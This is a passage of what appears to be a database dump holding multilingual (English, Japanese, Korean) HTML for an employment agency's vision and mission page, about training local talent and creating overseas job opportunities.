style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 202, 'en', 0, '<blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><h3>&nbsp;</h3><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 202, 'ja', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 202, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 230, 'en', 0, '<blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><h3>&nbsp;</h3><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 230, 'ja', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。<o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 230, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 